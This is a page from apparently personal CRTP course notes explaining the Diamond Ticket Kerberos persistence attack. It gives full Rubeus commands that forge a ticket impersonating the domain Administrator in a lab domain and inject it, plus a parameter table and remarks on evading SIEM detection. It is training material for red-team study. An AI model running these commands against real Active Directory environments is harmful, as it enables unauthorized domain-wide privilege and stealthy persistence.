Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  1. Certified Red Team Professional (CRTP) - Notes
  2. 8 - Persistence

8.3 - Diamond Ticket

Diamond Ticket (TGT Modification Attack)

A Diamond Ticket is a modified version of a legitimate TGT (Ticket Granting Ticket). Unlike Golden Tickets, which are completely forged from scratch, Diamond Tickets are based on real TGTs that are decrypted, modified, and re-encrypted using the krbtgt account key.


Key Characteristics

  • A Diamond Ticket is a TGT modification attack, whereas a Golden Ticket is a TGT forgery attack.

  • A legitimate TGT is captured and decrypted, its content (e.g., username, groups) is modified, and then it is re-encrypted with the krbtgt AES key.

  • The ticket will have valid timestamps, since they are inherited from a real DC-issued ticket.

  • More stealthy than Golden Tickets because:

    • TGT appears genuinely issued by the DC.

    • TGS requests based on this ticket match an actual TGT.

    • Less detectable by SIEMs and monitoring tools.

  • Persistence duration depends on TGT lifetime and krbtgt key rotation policy.


Forge a Diamond Ticket with Credentials

You can use Rubeus to create a Diamond Ticket using the krbtgt AES key and the credentials of a domain user:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /user:devan /password:new_password123 /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Forge a Diamond Ticket Using /tgtdeleg

If you already have a TGT delegation token (captured via Rubeus tgtdeleg), you can generate a Diamond Ticket without needing user credentials:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /tgtdeleg /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Parameters Explained

Option
Description

/diamond

Rubeus module for crafting a Diamond Ticket.

/krbkey:<key>

AES256 key of the krbtgt account (required for re-encryption).

/user:studentx + /password:...

Domain user credentials to request the real TGT.

/tgtdeleg

Uses a captured TGT delegation token instead of user credentials.

/ticketuser:administrator

User to impersonate in the new ticket.

/ticketuserid:500

RID of the impersonated user (default 500 = Administrator).

/groups:512

Groups the impersonated user should be a member of.

/domain, /dc

Target domain and Domain Controller.

/enctype:aes

Encryption type (must match the krbtgt key used).

/createnetonly:<path>

Creates a netonly logon session to isolate the context (e.g., spawn cmd).

/show

Displays the forged ticket before injection.

/ptt

Injects the forged ticket into the current session.

Labs

Previous8.2 - Silver TicketNext8.4 - Skeleton Key

Last updated 2 days ago

📝
8️⃣
Learning Object 10 lab